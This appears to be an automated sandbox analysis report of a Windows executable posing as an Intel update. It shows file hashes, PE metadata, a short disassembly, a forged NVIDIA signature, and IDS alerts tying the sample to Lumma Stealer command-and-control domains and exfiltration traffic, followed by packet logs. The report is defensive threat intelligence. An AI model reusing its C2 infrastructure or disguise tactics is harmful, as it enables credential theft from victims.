                                                                                                                                                                                                            Preview:.B.........................................................................................................................................................................................................................................................................................................t.M.....hi'D......Y.hs'D......Y..r...hx'D......Y..|X..h}'D......Y.Q.I...h.'D.....Y.0$M.Q.@..0$M.P.=B..h.'D.....Y...C..h.'D.....Y.....h.'D..}...Y..+O..h.'D..l...Y..!...h.'D..[...Y.45M....h.'D..E...Y.U....SVW.}.....e....E..E..w..E..E.E.E............v..G..H..z....E....v..G..H..g....E....v..O..I..T....E...v..O..I..A....E...v..O..I.......E...v..O..I.......E..O..1...?}...u..N..u..u..u..u..u..u..1........p.....u.........F.....3._..^[....U..V.u.3.W.~....p....N.j.j.P..j.j....Pj......u..........>3._.F.....^]...SV..3.Wj._.N...N(...^..^..~..^..^..^ .^$.4......f.^8.Nl.F:..^<.^@.FL.FP.FT.FX.F\.F`.Fd.....j....................F|U............[............u......3....................
                                                                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Entropy (8bit):7.976263398890355
                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                            File name:[UPD]Intel_Unit.2.1.exe
                                                                                                                                                                                                            File size:1'119'746 bytes
                                                                                                                                                                                                            MD5:25b4bac0866214df0bcb32a8dc280555
                                                                                                                                                                                                            SHA1:58513411b725c0f264013acacaba7fe069208aa7
                                                                                                                                                                                                            SHA256:17e8ebdf1c3303f6c9538e9998e533962aa732a1356434d6cf78ab353f3a9f06
                                                                                                                                                                                                            SHA512:4f63a60288d8e15eb01843d1ecc61344606a4e3bf0933cf8bd02892dbb7d2167b7b35d4ff17c5207b25057520d7147bfa4bed38d75b6429f0c9ebe6458de592d
                                                                                                                                                                                                            SSDEEP:24576:setHGMwy9WuUSPl/hw6z89q1zfaaJ+1DPVhPQLc3nVQMd:j7zMU+0pJQ9hPQcQu
                                                                                                                                                                                                            TLSH:6F35230507680071FDAB4F72147985096DB7F808B073DEAFE36C884DBBB1BA15B6A275
                                                                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L...X|.N.................n...R...B...8.....
                                                                                                                                                                                                            Icon Hash:f0f8f8e0c2d2c00a
                                                                                                                                                                                                            Entrypoint:0x403883
                                                                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                                                                            Digitally signed:true
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                            Time Stamp:0x4E807C58 [Mon Sep 26 13:21:28 2011 UTC]
                                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                                            OS Version Major:5
                                                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                                                            File Version Major:5
                                                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                                                            Subsystem Version Major:5
                                                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                                                            Import Hash:be41bf7b8cc010b614bd36bbca606973
                                                                                                                                                                                                            Signature Valid:false
                                                                                                                                                                                                            Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                                                                                                                            Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                            Error Number:-2146869232
                                                                                                                                                                                                            Not Before, Not After
                                                                                                                                                                                                            • 13/01/2023 01:00:00 17/01/2026 00:59:59
                                                                                                                                                                                                            Subject Chain
                                                                                                                                                                                                            • CN=NVIDIA Corporation, OU=2-J, O=NVIDIA Corporation, L=Santa Clara, S=California, C=US
                                                                                                                                                                                                            Version:3
                                                                                                                                                                                                            Thumbprint MD5:5F1B6B6C408DB2B4D60BAA489E9A0E5A
                                                                                                                                                                                                            Thumbprint SHA-1:15F760D82C79D22446CC7D4806540BF632B1E104
                                                                                                                                                                                                            Thumbprint SHA-256:28AF76241322F210DA473D9569EFF6F27124C4CA9F43933DA547E8D068B0A95D
                                                                                                                                                                                                            Serial:0997C56CAA59055394D9A9CDB8BEEB56
                                                                                                                                                                                                            Instruction
                                                                                                                                                                                                            sub esp, 000002D4h
                                                                                                                                                                                                            push ebx
                                                                                                                                                                                                            push ebp
                                                                                                                                                                                                            push esi
                                                                                                                                                                                                            push edi
                                                                                                                                                                                                            push 00000020h
                                                                                                                                                                                                            xor ebp, ebp
                                                                                                                                                                                                            pop esi
                                                                                                                                                                                                            mov dword ptr [esp+18h], ebp
                                                                                                                                                                                                            mov dword ptr [esp+10h], 00409268h
                                                                                                                                                                                                            mov dword ptr [esp+14h], ebp
                                                                                                                                                                                                            call dword ptr [00408030h]
                                                                                                                                                                                                            push 00008001h
                                                                                                                                                                                                            call dword ptr [004080B4h]
                                                                                                                                                                                                            push ebp
                                                                                                                                                                                                            call dword ptr [004082C0h]
                                                                                                                                                                                                            push 00000008h
                                                                                                                                                                                                            mov dword ptr [00472EB8h], eax
                                                                                                                                                                                                            call 00007F34A0BE7C5Bh
                                                                                                                                                                                                            push ebp
                                                                                                                                                                                                            push 000002B4h
                                                                                                                                                                                                            mov dword ptr [00472DD0h], eax
                                                                                                                                                                                                            lea eax, dword ptr [esp+38h]
                                                                                                                                                                                                            push eax
                                                                                                                                                                                                            push ebp
                                                                                                                                                                                                            push 00409264h
                                                                                                                                                                                                            call dword ptr [00408184h]
                                                                                                                                                                                                            push 0040924Ch
                                                                                                                                                                                                            push 0046ADC0h
                                                                                                                                                                                                            call 00007F34A0BE793Dh
                                                                                                                                                                                                            call dword ptr [004080B0h]
                                                                                                                                                                                                            push eax
                                                                                                                                                                                                            mov edi, 004C30A0h
                                                                                                                                                                                                            push edi
                                                                                                                                                                                                            call 00007F34A0BE792Bh
                                                                                                                                                                                                            push ebp
                                                                                                                                                                                                            call dword ptr [00408134h]
                                                                                                                                                                                                            cmp word ptr [004C30A0h], 0022h
                                                                                                                                                                                                            mov dword ptr [00472DD8h], eax
                                                                                                                                                                                                            mov eax, edi
                                                                                                                                                                                                            jne 00007F34A0BE522Ah
                                                                                                                                                                                                            push 00000022h
                                                                                                                                                                                                            pop esi
                                                                                                                                                                                                            mov eax, 004C30A2h
                                                                                                                                                                                                            push esi
                                                                                                                                                                                                            push eax
                                                                                                                                                                                                            call 00007F34A0BE7601h
                                                                                                                                                                                                            push eax
                                                                                                                                                                                                            call dword ptr [00408260h]
                                                                                                                                                                                                            mov esi, eax
                                                                                                                                                                                                            mov dword ptr [esp+1Ch], esi
                                                                                                                                                                                                            jmp 00007F34A0BE52B3h
                                                                                                                                                                                                            push 00000020h
                                                                                                                                                                                                            pop ebx
                                                                                                                                                                                                            cmp ax, bx
                                                                                                                                                                                                            jne 00007F34A0BE522Ah
                                                                                                                                                                                                            add esi, 02h
                                                                                                                                                                                                            cmp word ptr [esi], bx
                                                                                                                                                                                                            Programming Language:
                                                                                                                                                                                                            • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                                            • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                                            • [ C ] VS2010 SP1 build 40219
                                                                                                                                                                                                            • [RES] VS2010 SP1 build 40219
                                                                                                                                                                                                            • [LNK] VS2010 SP1 build 40219
                                                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x9b340xb4.rdata
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xf40000x8dfe.rsrc
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x10efda0x2628
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x7a0000x964.ndata
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x80000x2d0.rdata
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                            .text0x10000x6dae0x6e0000499a6f70259150109c809d6aa0e6edFalse0.6611150568181818data6.508529563136936IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                            .rdata0x80000x2a620x2c0007990aaa54c3bc638bb87a87f3fb13e3False0.3526278409090909data4.390535020989255IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                            .data0xb0000x67ebc0x200014871d9a00f0e0c8c2a7cd25606c453False0.203125data1.4308602597540492IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                            .ndata0x730000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                            .rsrc0xf40000x8dfe0x8e00cfada53c1c6680a8bb890acdce7bed8fFalse0.8463358274647887data7.334910285042412IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                            .reloc0xfd0000xf320x1000d035e2aaf2ca623d94a572821f95b139False0.599853515625data5.512137549495014IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                            RT_ICON0xf41c00x605fPNG image data, 128 x 128, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0003648007782417
                                                                                                                                                                                                            RT_ICON0xfa2200x2668Device independent bitmap graphic, 48 x 96 x 32, image size 9792EnglishUnited States0.4945077298616762
                                                                                                                                                                                                            RT_DIALOG0xfc8880x100dataEnglishUnited States0.5234375
                                                                                                                                                                                                            RT_DIALOG0xfc9880x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                                                                                            RT_DIALOG0xfcaa40x60dataEnglishUnited States0.7291666666666666
                                                                                                                                                                                                            RT_GROUP_ICON0xfcb040x22dataEnglishUnited States0.9705882352941176
                                                                                                                                                                                                            RT_MANIFEST0xfcb280x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193
                                                                                                                                                                                                            DLLImport
                                                                                                                                                                                                            KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                                                                                                                                                                                            USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                                                                                                                                                                                            GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                                                                                                                                                                                            SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                                                                                                                                                                                            ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                                                                                                                                                                                            COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                                                                                                                            ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                                                                                                                                            VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
                                                                                                                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                            EnglishUnited States
                                                                                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                            2025-01-07T15:45:54.878018+01002058616ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (nearycrepso .shop)1192.168.2.6592381.1.1.153UDP
                                                                                                                                                                                                            2025-01-07T15:45:54.902008+01002058598ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (abruptyopsn .shop)1192.168.2.6612131.1.1.153UDP
                                                                                                                                                                                                            2025-01-07T15:45:54.914008+01002058632ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wholersorie .shop)1192.168.2.6525581.1.1.153UDP
                                                                                                                                                                                                            2025-01-07T15:45:54.929024+01002058610ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (framekgirus .shop)1192.168.2.6613041.1.1.153UDP
                                                                                                                                                                                                            2025-01-07T15:45:54.941156+01002058628ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tirepublicerj .shop)1192.168.2.6516251.1.1.153UDP
                                                                                                                                                                                                            2025-01-07T15:45:54.953023+01002058618ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (noisycuttej .shop)1192.168.2.6635951.1.1.153UDP
                                                                                                                                                                                                            2025-01-07T15:45:54.972074+01002058622ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rabidcowse .shop)1192.168.2.6603131.1.1.153UDP
                                                                                                                                                                                                            2025-01-07T15:45:54.988060+01002058606ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cloudewahsj .shop)1192.168.2.6506991.1.1.153UDP
                                                                                                                                                                                                            2025-01-07T15:45:55.742966+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650736104.102.49.254443TCP
                                                                                                                                                                                                            2025-01-07T15:45:56.253659+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.650736104.102.49.254443TCP
                                                                                                                                                                                                            2025-01-07T15:45:56.841787+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650737104.21.64.1443TCP
                                                                                                                                                                                                            2025-01-07T15:45:57.172707+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.650737104.21.64.1443TCP
                                                                                                                                                                                                            2025-01-07T15:45:57.172707+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.650737104.21.64.1443TCP
                                                                                                                                                                                                            2025-01-07T15:45:57.643942+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650738104.21.64.1443TCP
                                                                                                                                                                                                            2025-01-07T15:45:58.137343+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.650738104.21.64.1443TCP
                                                                                                                                                                                                            2025-01-07T15:45:58.137343+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.650738104.21.64.1443TCP
                                                                                                                                                                                                            2025-01-07T15:45:58.807522+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650739104.21.64.1443TCP
                                                                                                                                                                                                            2025-01-07T15:45:59.958646+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650740104.21.64.1443TCP
                                                                                                                                                                                                            2025-01-07T15:46:01.049260+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650741104.21.64.1443TCP
                                                                                                                                                                                                            2025-01-07T15:46:02.386841+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650742104.21.64.1443TCP
                                                                                                                                                                                                            2025-01-07T15:46:02.735849+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.650742104.21.64.1443TCP
                                                                                                                                                                                                            2025-01-07T15:46:03.635728+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650743104.21.64.1443TCP
                                                                                                                                                                                                            2025-01-07T15:46:04.797695+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650744104.21.64.1443TCP
                                                                                                                                                                                                            2025-01-07T15:46:05.278650+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.650744104.21.64.1443TCP
                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                            Jan 7, 2025 15:45:51.688318968 CET5073153192.168.2.6162.159.36.2
                                                                                                                                                                                                            Jan 7, 2025 15:45:51.693111897 CET5350731162.159.36.2192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:51.693231106 CET5073153192.168.2.6162.159.36.2
                                                                                                                                                                                                            Jan 7, 2025 15:45:51.698065042 CET5350731162.159.36.2192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:52.286669016 CET5073153192.168.2.6162.159.36.2
                                                                                                                                                                                                            Jan 7, 2025 15:45:52.292876005 CET5350731162.159.36.2192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:52.292948961 CET5073153192.168.2.6162.159.36.2
                                                                                                                                                                                                            Jan 7, 2025 15:45:55.087388039 CET50736443192.168.2.6104.102.49.254
                                                                                                                                                                                                            Jan 7, 2025 15:45:55.087436914 CET44350736104.102.49.254192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:55.088387012 CET50736443192.168.2.6104.102.49.254
                                                                                                                                                                                                            Jan 7, 2025 15:45:55.092164040 CET50736443192.168.2.6104.102.49.254
                                                                                                                                                                                                            Jan 7, 2025 15:45:55.092178106 CET44350736104.102.49.254192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:55.742883921 CET44350736104.102.49.254192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:55.742965937 CET50736443192.168.2.6104.102.49.254
                                                                                                                                                                                                            Jan 7, 2025 15:45:55.744935036 CET50736443192.168.2.6104.102.49.254
                                                                                                                                                                                                            Jan 7, 2025 15:45:55.744949102 CET44350736104.102.49.254192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:55.745196104 CET44350736104.102.49.254192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:55.790399075 CET50736443192.168.2.6104.102.49.254
                                                                                                                                                                                                            Jan 7, 2025 15:45:55.799670935 CET50736443192.168.2.6104.102.49.254
                                                                                                                                                                                                            Jan 7, 2025 15:45:55.847332001 CET44350736104.102.49.254192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:56.253724098 CET44350736104.102.49.254192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:56.253747940 CET44350736104.102.49.254192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:56.253779888 CET44350736104.102.49.254192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:56.253799915 CET44350736104.102.49.254192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:56.253823996 CET44350736104.102.49.254192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:56.253840923 CET50736443192.168.2.6104.102.49.254
                                                                                                                                                                                                            Jan 7, 2025 15:45:56.253870964 CET44350736104.102.49.254192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:56.253896952 CET50736443192.168.2.6104.102.49.254
                                                                                                                                                                                                            Jan 7, 2025 15:45:56.253923893 CET50736443192.168.2.6104.102.49.254
                                                                                                                                                                                                            Jan 7, 2025 15:45:56.346896887 CET44350736104.102.49.254192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:56.346957922 CET44350736104.102.49.254192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:56.347064972 CET50736443192.168.2.6104.102.49.254
                                                                                                                                                                                                            Jan 7, 2025 15:45:56.347084045 CET44350736104.102.49.254192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:56.347134113 CET50736443192.168.2.6104.102.49.254
                                                                                                                                                                                                            Jan 7, 2025 15:45:56.351931095 CET44350736104.102.49.254192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:56.352021933 CET50736443192.168.2.6104.102.49.254
                                                                                                                                                                                                            Jan 7, 2025 15:45:56.356408119 CET44350736104.102.49.254192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:56.356467962 CET50736443192.168.2.6104.102.49.254
                                                                                                                                                                                                            Jan 7, 2025 15:45:56.356476068 CET44350736104.102.49.254192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:56.356527090 CET50736443192.168.2.6104.102.49.254
                                                                                                                                                                                                            Jan 7, 2025 15:45:56.357686996 CET50736443192.168.2.6104.102.49.254
                                                                                                                                                                                                            Jan 7, 2025 15:45:56.357702971 CET44350736104.102.49.254192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:56.369738102 CET50737443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:45:56.369775057 CET44350737104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:56.369843006 CET50737443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:45:56.370121956 CET50737443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:45:56.370134115 CET44350737104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:56.841669083 CET44350737104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:56.841787100 CET50737443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:45:56.843317986 CET50737443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:45:56.843329906 CET44350737104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:56.843576908 CET44350737104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:56.844857931 CET50737443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:45:56.844883919 CET50737443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:45:56.844932079 CET44350737104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:57.172729015 CET44350737104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:57.172827005 CET44350737104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:57.172895908 CET50737443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:45:57.173129082 CET50737443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:45:57.173151970 CET44350737104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:57.173167944 CET50737443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:45:57.173175097 CET44350737104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:57.178766966 CET50738443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:45:57.178817987 CET44350738104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:57.178896904 CET50738443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:45:57.179157972 CET50738443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:45:57.179172039 CET44350738104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:57.643850088 CET44350738104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:57.643942118 CET50738443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:45:57.647497892 CET50738443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:45:57.647510052 CET44350738104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:57.647753954 CET44350738104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:57.648828983 CET50738443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:45:57.648859024 CET50738443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:45:57.648893118 CET44350738104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:58.137353897 CET44350738104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:58.137430906 CET44350738104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:58.137465000 CET44350738104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:58.137495041 CET50738443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:45:58.137502909 CET44350738104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:58.137512922 CET44350738104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:58.137548923 CET50738443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:45:58.137569904 CET44350738104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:58.137610912 CET50738443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:45:58.137617111 CET44350738104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:58.138026953 CET44350738104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:58.138067961 CET44350738104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:58.138082027 CET50738443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:45:58.138087034 CET44350738104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:58.138137102 CET50738443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:45:58.138140917 CET44350738104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:58.142011881 CET44350738104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:58.142072916 CET50738443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:45:58.142077923 CET44350738104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:58.196749926 CET50738443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:45:58.224653006 CET44350738104.21.64.1192.168.2.6
